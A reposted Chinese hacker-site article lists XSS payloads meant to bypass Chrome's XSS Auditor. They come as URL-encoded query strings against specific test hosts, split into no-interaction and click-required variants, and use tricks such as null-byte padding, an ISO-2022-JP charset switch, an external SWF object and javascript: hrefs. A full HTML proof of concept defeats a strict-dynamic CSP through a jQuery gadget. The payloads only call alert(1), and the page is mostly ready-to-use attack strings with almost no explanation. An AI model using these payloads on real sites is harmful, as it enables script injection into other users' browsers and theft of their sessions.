记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

Chrome XSS Auditor Bypass Payload

2022-10-13 02:49

测试版本:

测试环境:

===============================

不需要交互

http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Cbr%3E%00%00%00%00%00%00%00%3Cscript%3Ealert%281%29%3C%2fscript%3E

http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E

https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E

CSP bypass via jQuery Gadget

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-security-policy" content="script-src 'nonce-random' 'strict-dynamic';">
<script nonce=random src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.js"></script>
<script nonce=random>
$(document).ready(function(){
// code taken from http://api.jquery.com/after/
$( ".container" ).after( $( ".child" ) );
});
</script>
</head>
<body>
XSS XSS XSS
<form class="child"><input name="ownerDocument"/><script>alert(1);</script></form>
XSS XSS XSS
<p class="container"></p>
</body>
</html>

需要交互

http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Csvg%20width%3D10000px%20height%3D10000px%3E%3Ca%3E%3Crect%20width%3D10000px%20height%3D10000px%20z-index%3D9999999%20%2F%3E%3Canimate%20attributeName%3Dhref%20values%3Djavas%26%2399ript%3Aalert%281%29%3E

https://vulnerabledoma.in/xss_auditortest?test=5&q=%3Ca%20href=/**/alert%281%29%3ECLICK%3C/a%3E%3Cbase%20href=%22javascript:%5C


知识来源: https://uxss.net/2017/05/22/Chrome%20XSS%20Auditor%20Bypass%20Payload/

阅读:171997 | 评论:0 | 标签:xss Tor chrome

想收藏或者和大家分享这篇好文章→复制链接地址

“Chrome XSS Auditor Bypass Payload”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

十年经营持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

🙇🧎¥由自富财,长成起一↓

标签云 ☁